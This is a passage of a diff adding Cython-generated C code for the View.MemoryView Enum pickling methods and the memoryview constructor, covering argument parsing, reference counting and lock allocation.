if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_MemviewEnum___reduce_cython__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_MemviewEnum___reduce_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self) { + PyObject *__pyx_v_state = 0; + PyObject *__pyx_v__dict = 0; + int __pyx_v_use_setstate; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":5 + * cdef object _dict + * cdef bint use_setstate + * state = (self.name,) # <<<<<<<<<<<<<< + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: + */ + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v_self->name); + __Pyx_GIVEREF(__pyx_v_self->name); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_self->name); + __pyx_v_state = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "(tree fragment)":6 + * cdef bint use_setstate + * state = (self.name,) + * _dict = getattr(self, '__dict__', None) # <<<<<<<<<<<<<< + * if _dict is not None: + * state += (_dict,) + */ + __pyx_t_1 = __Pyx_GetAttr3(((PyObject *)__pyx_v_self), __pyx_n_s_dict, Py_None); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v__dict = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":7 + * state = (self.name,) + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: # <<<<<<<<<<<<<< + * state += (_dict,) + * use_setstate = True + */ + __pyx_t_2 = (__pyx_v__dict != Py_None); + if (__pyx_t_2) { + + /* "(tree fragment)":8 + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: + * state += (_dict,) # <<<<<<<<<<<<<< + * use_setstate = True + * else: + */ + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v__dict); + __Pyx_GIVEREF(__pyx_v__dict); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v__dict); + __pyx_t_3 = PyNumber_InPlaceAdd(__pyx_v_state, __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF_SET(__pyx_v_state, ((PyObject*)__pyx_t_3)); + __pyx_t_3 = 0; + + /* "(tree fragment)":9 + * if _dict is not None: + * state += (_dict,) + * use_setstate = True # <<<<<<<<<<<<<< + * else: + * use_setstate = self.name is not None + */ + __pyx_v_use_setstate = 1; + + /* "(tree fragment)":7 + * state = (self.name,) + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: # <<<<<<<<<<<<<< + * state += (_dict,) + * use_setstate = True + */ + goto __pyx_L3; + } + + /* "(tree fragment)":11 + * use_setstate = True + * else: + * use_setstate = self.name is not None # <<<<<<<<<<<<<< + * if use_setstate: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + */ + /*else*/ { + __pyx_t_2 = (__pyx_v_self->name != Py_None); + __pyx_v_use_setstate = __pyx_t_2; + } + __pyx_L3:; + + /* "(tree fragment)":12 + * else: + * use_setstate = self.name is not None + * if use_setstate: # <<<<<<<<<<<<<< + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + * else: + */ + if (__pyx_v_use_setstate) { + + /* "(tree fragment)":13 + * use_setstate = self.name is not None + * if use_setstate: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state # <<<<<<<<<<<<<< + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_pyx_unpickle_Enum); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_GIVEREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + PyTuple_SET_ITEM(__pyx_t_1, 0, ((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_INCREF(__pyx_int_136983863); + __Pyx_GIVEREF(__pyx_int_136983863); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_int_136983863); + __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(Py_None); + PyTuple_SET_ITEM(__pyx_t_1, 2, Py_None); + __pyx_t_4 = PyTuple_New(3); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_t_1); + __Pyx_INCREF(__pyx_v_state); + __Pyx_GIVEREF(__pyx_v_state); + PyTuple_SET_ITEM(__pyx_t_4, 2, __pyx_v_state); + __pyx_t_3 = 0; + __pyx_t_1 = 0; + __pyx_r = __pyx_t_4; + __pyx_t_4 = 0; + goto __pyx_L0; + + /* "(tree fragment)":12 + * else: + * use_setstate = self.name is not None + * if use_setstate: # <<<<<<<<<<<<<< + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + * else: + */ + } + + /* "(tree fragment)":15 + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * __pyx_unpickle_Enum__set_state(self, __pyx_state) + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_pyx_unpickle_Enum); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_GIVEREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + PyTuple_SET_ITEM(__pyx_t_1, 0, ((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_INCREF(__pyx_int_136983863); + __Pyx_GIVEREF(__pyx_int_136983863); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_int_136983863); + __Pyx_INCREF(__pyx_v_state); + __Pyx_GIVEREF(__pyx_v_state); + PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_v_state); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __pyx_t_4 = 0; + __pyx_t_1 = 0; + __pyx_r = __pyx_t_3; + __pyx_t_3 = 0; + goto __pyx_L0; + } + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.Enum.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_state); + __Pyx_XDECREF(__pyx_v__dict); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":16 + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state(self, __pyx_state) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_MemviewEnum_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_MemviewEnum_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 16, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 16, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 16, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.Enum.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_MemviewEnum_2__setstate_cython__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_MemviewEnum_2__setstate_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":17 + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + * def __setstate_cython__(self, __pyx_state): + * __pyx_unpickle_Enum__set_state(self, __pyx_state) # <<<<<<<<<<<<<< + */ + if (!(likely(PyTuple_CheckExact(__pyx_v___pyx_state))||((__pyx_v___pyx_state) == Py_None) || __Pyx_RaiseUnexpectedTypeError("tuple", __pyx_v___pyx_state))) __PYX_ERR(1, 17, __pyx_L1_error) + __pyx_t_1 = __pyx_unpickle_Enum__set_state(__pyx_v_self, ((PyObject*)__pyx_v___pyx_state)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 17, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":16 + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state(self, __pyx_state) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.Enum.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":349 + * cdef __Pyx_TypeInfo *typeinfo + * + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): # <<<<<<<<<<<<<< + * self.obj = obj + * self.flags = flags + */ + +/* Python wrapper */ +static int __pyx_memoryview___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_memoryview___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_obj = 0; + int __pyx_v_flags; + int __pyx_v_dtype_is_object; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_obj,&__pyx_n_s_flags,&__pyx_n_s_dtype_is_object,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_obj)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_flags)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 2, 3, 1); __PYX_ERR(1, 349, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_dtype_is_object); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__cinit__") < 0)) __PYX_ERR(1, 349, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_obj = values[0]; + __pyx_v_flags = __Pyx_PyInt_As_int(values[1]); if (unlikely((__pyx_v_flags == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + if (values[2]) { + __pyx_v_dtype_is_object = __Pyx_PyObject_IsTrue(values[2]); if (unlikely((__pyx_v_dtype_is_object == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + } else { + __pyx_v_dtype_is_object = ((int)0); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 2, 3, __pyx_nargs); __PYX_ERR(1, 349, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview___cinit__(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v_obj, __pyx_v_flags, __pyx_v_dtype_is_object); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview___cinit__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj, int __pyx_v_flags, int __pyx_v_dtype_is_object) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + Py_intptr_t __pyx_t_4; + size_t __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__cinit__", 0); + + /* "View.MemoryView":350 + * + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): + * self.obj = obj # <<<<<<<<<<<<<< + * self.flags = flags + * if type(self) is memoryview or obj is not None: + */ + __Pyx_INCREF(__pyx_v_obj); + __Pyx_GIVEREF(__pyx_v_obj); + __Pyx_GOTREF(__pyx_v_self->obj); + __Pyx_DECREF(__pyx_v_self->obj); + __pyx_v_self->obj = __pyx_v_obj; + + /* "View.MemoryView":351 + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): + * self.obj = obj + * self.flags = flags # <<<<<<<<<<<<<< + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) + */ + __pyx_v_self->flags = __pyx_v_flags; + + /* "View.MemoryView":352 + * self.obj = obj + * self.flags = flags + * if type(self) is memoryview or obj is not None: # <<<<<<<<<<<<<< + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: + */ + __pyx_t_2 = (((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self))) == ((PyObject *)__pyx_memoryview_type)); + if (!__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_2 = (__pyx_v_obj != Py_None); + __pyx_t_1 = __pyx_t_2; + __pyx_L4_bool_binop_done:; + if (__pyx_t_1) { + + /* "View.MemoryView":353 + * self.flags = flags + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) # <<<<<<<<<<<<<< + * if self.view.obj == NULL: + * (<__pyx_buffer *> &self.view).obj = Py_None + */ + __pyx_t_3 = __Pyx_GetBuffer(__pyx_v_obj, (&__pyx_v_self->view), __pyx_v_flags); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 353, __pyx_L1_error) + + /* "View.MemoryView":354 + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: # <<<<<<<<<<<<<< + * (<__pyx_buffer *> &self.view).obj = Py_None + * Py_INCREF(Py_None) + */ + __pyx_t_1 = (((PyObject *)__pyx_v_self->view.obj) == NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":355 + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: + * (<__pyx_buffer *> &self.view).obj = Py_None # <<<<<<<<<<<<<< + * Py_INCREF(Py_None) + * + */ + ((Py_buffer *)(&__pyx_v_self->view))->obj = Py_None; + + /* "View.MemoryView":356 + * if self.view.obj == NULL: + * (<__pyx_buffer *> &self.view).obj = Py_None + * Py_INCREF(Py_None) # <<<<<<<<<<<<<< + * + * if not __PYX_CYTHON_ATOMICS_ENABLED(): + */ + Py_INCREF(Py_None); + + /* "View.MemoryView":354 + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: # <<<<<<<<<<<<<< + * (<__pyx_buffer *> &self.view).obj = Py_None + * Py_INCREF(Py_None) + */ + } + + /* "View.MemoryView":352 + * self.obj = obj + * self.flags = flags + * if type(self) is memoryview or obj is not None: # <<<<<<<<<<<<<< + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: + */ + } + + /* "View.MemoryView":358 + * Py_INCREF(Py_None) + * + * if not __PYX_CYTHON_ATOMICS_ENABLED(): # <<<<<<<<<<<<<< + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: + */ + __pyx_t_1 = (!__PYX_CYTHON_ATOMICS_ENABLED()); + if (__pyx_t_1) { + + /* "View.MemoryView":360 + * if not __PYX_CYTHON_ATOMICS_ENABLED(): + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: # <<<<<<<<<<<<<< + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + */ + __pyx_t_1 = (__pyx_memoryview_thread_locks_used < 8); + if (__pyx_t_1) { + + /* "View.MemoryView":361 + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: + */ + __pyx_v_self->lock = (__pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used]); + + /* "View.MemoryView":362 + * if __pyx_memoryview_thread_locks_used < 8: + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 # <<<<<<<<<<<<<< + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() + */ + __pyx_memoryview_thread_locks_used = (__pyx_memoryview_thread_locks_used + 1); + + /* "View.MemoryView":360 + * if not __PYX_CYTHON_ATOMICS_ENABLED(): + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: # <<<<<<<<<<<<<< + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + */ + } + + /* "View.MemoryView":363 + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: # <<<<<<<<<<<<<< + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: + */ + __pyx_t_1 = (__pyx_v_self->lock == NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":364 + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() # <<<<<<<<<<<<<< + * if self.lock is NULL: + * raise MemoryError + */ + __pyx_v_self->lock = PyThread_allocate_lock(); + + /* "View.MemoryView":365 + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + __pyx_t_1 = (__pyx_v_self->lock == NULL); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":366 + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: + * raise MemoryError # <<<<<<<<<<<<<< + * + * if flags & PyBUF_FORMAT: + */ + PyErr_NoMemory(); __PYX_ERR(1, 366, __pyx_L1_error) + + /* "View.MemoryView":365 + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + } + + /* "View.MemoryView":363 + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: # <<<<<<<<<<<<<< + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: + */ + } + + /* "View.MemoryView":358 + * Py_INCREF(Py_None) + * + * if not __PYX_CYTHON_ATOMICS_ENABLED(): # <<<<<<<<<<<<<< + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: + */ + } + + /* "View.MemoryView":368 + * raise MemoryError + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_FORMAT) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":369 + * + * if flags & PyBUF_FORMAT: + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') # <<<<<<<<<<<<<< + * else: + * self.dtype_is_object = dtype_is_object + */ + __pyx_t_2 = ((__pyx_v_self->view.format[0]) == 'O'); + if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L12_bool_binop_done; + } + __pyx_t_2 = ((__pyx_v_self->view.format[1]) == '\x00'); + __pyx_t_1 = __pyx_t_2; + __pyx_L12_bool_binop_done:; + __pyx_v_self->dtype_is_object = __pyx_t_1; + + /* "View.MemoryView":368 + * raise MemoryError + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') + * else: + */ + goto __pyx_L11; + } + + /* "View.MemoryView":371 + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') + * else: + * self.dtype_is_object = dtype_is_object # <<<<<<<<<<<<<< + * + * assert (&self.acquisition_count) % sizeof(__pyx_atomic_int_type) == 0 + */ + /*else*/ { + __pyx_v_self->dtype_is_object = __pyx_v_dtype_is_object; + } + __pyx_L11:; + + /* "View.MemoryView":373 + * self.dtype_is_object = dtype_is_object + * + * assert (&self.acquisition_count) % sizeof(__pyx_atomic_int_type) == 0 # <<<<<<<<<<<<<< + * self.typeinfo = NULL + * + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_4 = ((Py_intptr_t)((void *)(&__pyx_v_self->acquisition_count))); + __pyx_t_5 = (sizeof(__pyx_atomic_int_type)); + if (unlikely(__pyx_t_5 == 0)) { + PyErr_SetString(PyExc_ZeroDivisionError, "integer division or modulo by zero"); + __PYX_ERR(1, 373, __pyx_L1_error) + } + __pyx_t_1 = ((__pyx_t_4 % __pyx_t_5) == 0); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(1, 373, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(1, 373, __pyx_L1_error) + #endif + + /* "View.MemoryView":374 + * + * assert (&self.acquisition_count) % sizeof(__pyx_atomic_int_type) == 0 + * self.typeinfo = NULL # <<<<<<<<<<<<<< + * + * def __dealloc__(memoryview self): + */ + __pyx_v_self->typeinfo = NULL; + + /* "View.MemoryView":349 + * cdef __Pyx_TypeInfo *typeinfo + * + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): # <<<<<<<<<<<<<< + * self.obj = obj + * self.flags = flags + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + 